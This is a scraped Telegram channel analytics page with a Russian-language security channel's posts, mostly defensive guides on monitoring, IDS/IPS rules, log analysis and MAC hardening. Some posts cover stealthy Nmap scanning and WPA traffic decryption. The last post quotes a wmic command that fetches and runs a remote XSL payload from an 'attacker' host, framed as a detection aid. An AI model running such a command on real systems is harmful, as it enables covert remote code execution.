CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition
Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 12 538 subscribers, ranking 10 134 in the Technologies & Applications category and 52 701 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 538 subscribers.
According to the latest data from 20 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 517 over the last 30 days and by 50 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 12.15%. Within the first 24 hours after publication, content typically collects 6.95% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 522 views. Within the first day, a publication typically gains 871 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 4.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 21 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
⏺️ Большой плейлист от CISO — полный разбор основ и актуальных практик ⏺️ Актуальная теория по пентесту за 5 часов — структурированный вводный курс ⏺️ WEB APP этичный хакинг — практический гайд по безопасности веб-приложений ⏺️ Основы кибербезопасности за 3 часа — сжатая база знаний для старта ⏺️ Огромный курс по ИБ от Cisco — глубокое погружение в профессиюЭти ресурсы отлично подходят как для начинающих, так и для тех, кто хочет систематизировать знания и двигаться дальше в сфере кибербезопасности. сохраняй и смотри) ☠️ CodeGuard: PySec Edition | Чат
👨💻 Что внутри: - Основы исследования киберугроз и аналитической работы - Подробное описание процесса IDIR и его этапов (F3EAD) - Практические примеры и протоколы реагирования - Стратегическая аналитика и построение команды аналитиков угрозКнига идеально подойдет аналитикам кибербезопасности, специалистам по реагированию на инциденты и всем, кто хочет углубить знания в области комплексного анализа и нейтрализации угроз. 💠 Бери книгу → [Arhive] 😈 CodeGuard | Чат
Prometheus + Grafana — это не только графики загрузки CPU, но и мощный стек для автоматизации мониторинга безопасности: отслеживание попыток входа, аномалий в сетевой активности, состояния firewall и службы аудита. Ниже мы представили практический гайд, как построить такую систему на базе Linux‑серверов🔍 Что и как собирать? Базовая схема: 1) Для начала на каждом Linux‑хосте ставим экспортёры, которые отдают метрики по HTTP (порт 9100) 2) Добавляем prometheus, который периодически ходит по endpoint’ам и забирает метрики 3) Grafana подключается к Prometheus, как к источнику данных, и строит дашборды, алерты и панели безопасности 4) Также можно добавить оповещения и RBAC/HTTPS для защиты самих Prometheus/Grafana. — Для безопасности нас интересуют: системные метрики, логи аутентификации, состояние iptables/nftables, службы IDS/IPS и т.п. 😓 Установка Prometheus и node_exporter — На мониторинговом сервере (Prometheus):
# Debian/Ubuntu
sudo useradd -M -r -s /bin/false prometheus
wget https://github.com/prometheus/prometheus/releases/latest/download/prometheus-linux-amd64.tar.gz
tar xzf prometheus-linux-amd64.tar.gz
sudo mv prometheus*/{prometheus,promtool} /usr/local/bin/
sudo mkdir -p /etc/prometheus /var/lib/prometheus
— Конфиг prometheus.yml:
global:
scrape_interval: 15s
scrape_configs:
- job_name: "nodes"
static_configs:
- targets: ["node1:9100", "node2:9100"]
(❓ Здесь Prometheus каждые 15 секунд опрашивает node_exporter на хостах node1 и node2)
— На каждом Linux‑узле:
wget https://github.com/prometheus/node_exporter/releases/latest/download/node_exporter-linux-amd64.tar.gz
tar xzf node_exporter-linux-amd64.tar.gz
sudo mv node_exporter*/node_exporter /usr/local/bin/
sudo useradd -M -r -s /bin/false nodeexp
sudo -u nodeexp /usr/local/bin/node_exporter --web.listen-address=":9100"
(❓ node_exporter отдаёт метрики по /metrics: загрузка, диски, контекстные переключения, сетевые соединения и многое другое)
⚠️ Безопасность самого мониторинга
— Ограничьте доступ к портам 9090 (Prometheus), 9100 (node_exporter) и 3000 (Grafana) через firewall, но только с доверенных IP/подсетей
— Для node_exporter, если он доступен извне, используйте TLS и базовую аутентификацию за reverse‑proxy и сконфигурируйте Prometheus на HTTPS‑scrape
— В Grafana сразу меняйте дефолтный пароль admin, включайте HTTPS и настраивайте роли/группы доступа
⚠️ Grafana: дашборды и алерты
— Подключаем Prometheus как источник данных и создаём дашборды:
1) Панель «Security overview» >>> неудачные ssh‑логины по хостам, количество заблокированных IP, активность IDS, число sudo‑операций
2) Панель «Network anomalies >>> входящий/исходящий трафик по интерфейсам, число открытых соединений, количество дропнутых пакетов
3) Панель «Host hardening» >>> состояние firewall, загруженность CPU/IO, свободное место
— Alerting в Grafana:
1) Создаём правило, которое срабатывает, например, при N неудачных ssh‑логинах за X минут или при превышении порога дропнутых пакетов
2) Настраиваем уведомления (Telegram bot, email и др.)
3) Группируем алерты по важности: критические (возможный взлом), warning (аномалия), info (регулярные события).
😊 Подведем итоги: Автоматизация мониторинга безопасности с Prometheus и Grafana превращает Linux‑инфраструктуру в прозрачную систему, где видно и железо, и сетевую активность, и попытки взлома, и вообще все, что душе угодно. Prometheus собирает метрики с хостов и служб ИБ, Grafana даёт наглядные дашборды и продвинутый алертинг, а правильное ограничение доступа и шифрование делают сам мониторинг безопасным
😈 CodeGuard: PySec Edition | Чат🎥 Как Nmap взаимодействует с IDS/IPS и как настраивать скан так, чтобы либо не палиться, либо наоборот использовать систему обнаружения вторжений в свою пользу 🎥 Как работать со службами и белыми списками: определение сервисов за портами, обход ограничений и грамотная фильтрация при массовом скане 🎥 Выявление хостов в сети, включая техники, которые помогают находить машины даже в задушенных сегментах с фильтрацией ICMP 🎥 Скрытые варианты сканирования портов, полезные при обходе простых фильтров и логирования👌 Отдельные большие разделы посвящены:
🎥 Интеграции Nmap с Metasploit: о том, как быстро превращать результаты сканирования в список потенциальных целей и модулей для эксплуатации 🎥 Настройке тайминга и производительности, чтобы балансировать между stealth и скоростью при сканировании крупных подсетей 🎥 Определению операционных систем, сетевых стеков и особенностей хостов по отпечаткам, а также анализу VPN и виртуальных окружений🖤 Не забыли и про обвязку Nmap:
🎥 Как использовать Zenmap в качестве инструмента для визуализации и автоматизации типовых профилей сканирования, когда нужно повторять одни и те же сценарии 🎥 Использование API Nmap при написании собственных утилит и обёрток 🎥 Глубокий разбор Nmap Scripting Engine: как расширять функционал сканера скриптами, писать свои проверки и автоматизировать рутинные тесты безопасности➡️ Статью, как всегда, можно изучить в нашем архиве 😈 CodeGuard: PySec Edition | Чат
sudo apt update && sudo apt install -y suricata
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -v
— Данные команды ставят Suricata из репозитория и запускают её как обычный IDS. Такой режим удобен для первичной обкатки правил, чтобы не стрелять себе в ногу на боевой сети
2️⃣ Включение IPS
# /etc/suricata/suricata.yaml – фрагмент
af-packet:
- interface: eth0
cluster-type: cluster_flow
cluster-id: 99
defrag: yes
copy-mode: ips
copy-iface: eth1
buffer-size: 64535
use-mmap: yes
— Данный фрагмент переводит Suricata в inline‑режим через AF_PACKET: трафик фактически прокачивается через Suricata, и движок может дропать пакеты по правилам
3️⃣ Правило для блокировки вредоносного трафика
local.rules
drop tcp any any -> any 80 (msg:"BLOCK suspicious HTTP user-agent"; \
content:"BadBot"; http_header; sid:100001; rev:1;)
— Одно из простейших правил IPS: если в HTTP‑заголовке User-Agent встречается строка BadBot, пакет дропается, а событие уходит в лог. В реальной жизни сюда добавляют сигнатуры C2, эксплойтов, сканеров и регэкспы по URI/Host
🐳 В итоге: при аккуратной настройке IPS перестаёт быть кирпичом для сети и превращается в реально полезный фильтр, который режет эксплуатацию известных уязвимостей, сканирование и типовой шум ещё на границе периметра
😈 CodeGuard: PySec Edition | Чат➡️ Все маршруты кликабельны: можно переходить по шагам и изучать темы глубже ➡️ Регулярные обновления под актуальные тренды и требования рынка ➡️ Есть функции для отслеживания своего прогресса — чтобы видеть, где ты и куда двигатьсяПодойдет всем — от новичков до опытных специалистов, которым нужно систематизировать знания или быстро войти в новую область. 🔋 Ссылка для старта 😈 CodeGuard | Чат
Ghidra — бесплатный инструмент для reverse engineering от NSA для декомпиляции, анализа бинарей, работы с разными архитектурами и наличием удобного GUI. Но сам по себе такой комбайн легко отпугивает, без хорошего гида можно залипнуть в интерфейсе и так и не дойти до практики🤩 Сборник роликов Ghidra Reversing Tutorials как раз решает эту проблему — это серия роликов, где автор пошагово проводит через реальную работу реверсера от первого запуска до анализа сложных участков кода 👩💻 Что даёт плейлист: • Понимание базового интерфейса Ghidra • Практику по декомпиляции и сопоставлению ассемблера с высоким уровнем, чтобы начать видеть бизнес‑логику в бинаре • Разбор типичных задач ИБ: работа со строками, проверками, модификацию поведения инструмента • Демонстрацию рабочих приёмов, которые реально используют в malware‑анализе и разборе закрытых приложений ⛓ Ссылка на плейлист: [тык] 😈 CodeGuard | Чат
1. Gophish — популярнейший open source фреймворк для эмуляции рассылок, сбора метрик и обучения 2. PhishTank — бесплатная народная база фишинговых сайтов с API, хороший дополнительный источник IOC для быстрой проверки ссылок и интеграции в собственные скрипты и прокси 3. OpenPhish — коммерческий фид URL/домёнов, замеченных в фишинговых кампаниях. Часто используется как источник данных для SIEM, почтовых шлюзов и NGFW 4. VirusTotal — стандарт проверки подозрительных файлов и ссылок, даёт пересечение по десяткам движков и репутационных движков, удобен для ручного и автоматизированного анализа 5. urlscan.io — глубокий разбор URL: скриншоты, DOM, сетевые запросы, редиректы и маппинг на связанные домены; полезен для разборов сложных фишинговых страниц и brand‑impersonation 6. Google Safe Browsing API — проверка ссылок по базе Google; логично использовать как ещё один слой проверки URL в прокси, боте или веб‑приложении 7. Barracuda Email Protection — комплексная защита почты с сильным уклоном в антифишинг и защиту доменной репутации 8. KnowBe4 — один из самых известных сервисов user awareness: фишинговые симуляции, обучение, метрики кликабельности и снижение риска за счёт практики 9. King Phisher — более продвинутый фреймворк для сложных фишинг‑кампаний c шаблонами, трекингом действий пользователей и гибкой кастомизацией. 10. URLhaus / Spamhaus — фиды вредоносных и фишинговых URL или домёнов, которые удобно использовать как источник IOC для почтовых шлюзов, SIEM и систем хантингаДальше можно наращивать глубину: добавлять интеграции с SIEM, SOAR, прокси и писать хантинг‑запросы поверх фидов и логов 🖱 😈 Codeguard | Чат
sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
filebeat.inputs:
- type: log
paths:
- /var/log/auth.log
- /var/log/syslog
(Эта настройка берёт базовые Linux‑логи и отправляет их по сети на Logstash для дальнейшего анализа)
2️⃣ Настройка Logstash: фильтруем и парсим события для поиска ключевых деталей
input { beats { port => 5044 } }
filter {
grok { match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:host} %{DATA:program} %{GREEDYDATA:msg}" } }
date { match => [ "timestamp", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ] }
}
output { elasticsearch { hosts => ["localhost:9200"] index => "security-logs-%{+YYYY.MM.dd}" } }
(Конфиг Logstash разбирает системные логи: вытаскивает дату, хост, программу, сообщение, чтобы в итоге события лежали в индексах с датой)
3️⃣ В Kibana быстро настраиваем дашборды:
— Выбираем нужный индекс “security-logs-*”
— Затем задаём фильтры (user, event.type, IP)
— Строим графики и ищем всплески активности. Вот и все 👾
👀 Практические лайфхаки: Грок‑фильтры вытаскивают важные поля, визуализации показывают динамику событий, а деление по датам индекс ускоряет расследование и поиск аномалий
📚 Материалы для прокачки:
*Официальная документация Filebeat*
*Руководство по Grok парсингу*
Пишите в чат, на какую тему вы бы хотели получить интересный гайд 👽
😈 CodeGuard | ЧатВ Wireshark нужно: 1) Захватить трафик вместе с рукопожатием (например, через Airodump-ng или сам Wireshark в режиме мониторинга) 2) В настройках Wireshark добавить ключ для расшифровки в формате wpa-pwd парол:SSID 3) Включить поддержку IEEE 802.11 в параметрах протоколаПосле этого трафик станет доступен для анализа — увидите DNS, HTTP запросы и другие полезные пакеты. 🤒 Подробнее руководство тут 😈 CodeGuard | Чат
«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"
/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным
# Меняем SELINUX=permissive на SELINUX=enforcing
❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил
🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования
sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx
🤨 Что выбрать?
— Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями
— Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили
🔗Полезные статьи на эту тему:
• Core Differences Between SELinux and AppArmor
• AppArmor vs SELinux
😈 CodeGuard | ЧатName: WMIC
Category: Binaries
FullPath:
- Path: C:\Windows\System32\wbem\wmic.exe
Commands:
- Command: wmic.exe process get brief /format:"http://attacker/payload.xsl"
Description: Execute script from remote XSL
MitreID:
- T1218.011
⚽️ Один из типичных кейсов — использование wmic.exe для выполнения кода через XSL-шаблон, хостящийся удалённо:
wmic.exe process get brief /format:"http://attacker/payload.xsl"
• wmic.exe — подписанный Microsoft бинарник
• через /format подсовывается XSL с внедрённым скриптом
• в итоге код выполняется руками доверенного системного инструмента, что сильно осложняет детект
🛡 Зачем опытному спецу смотреть на LOLBAS?
— Генерация правил по конкретным бинарникам и аргументам, привязка к ATT&CK
— Ограничение ненужных LOLBins через AppLocker/WDAC/EDR, whitelisting/blacklisting.
— Приоритизация подозрительных процессов и команд, основанная на живой базе LOtL‑артефактов
📱 Ссылка на проект: [тык]
😈 CodeGuard | Чат
Available now! Telegram Research 2025 — the year's key insights 
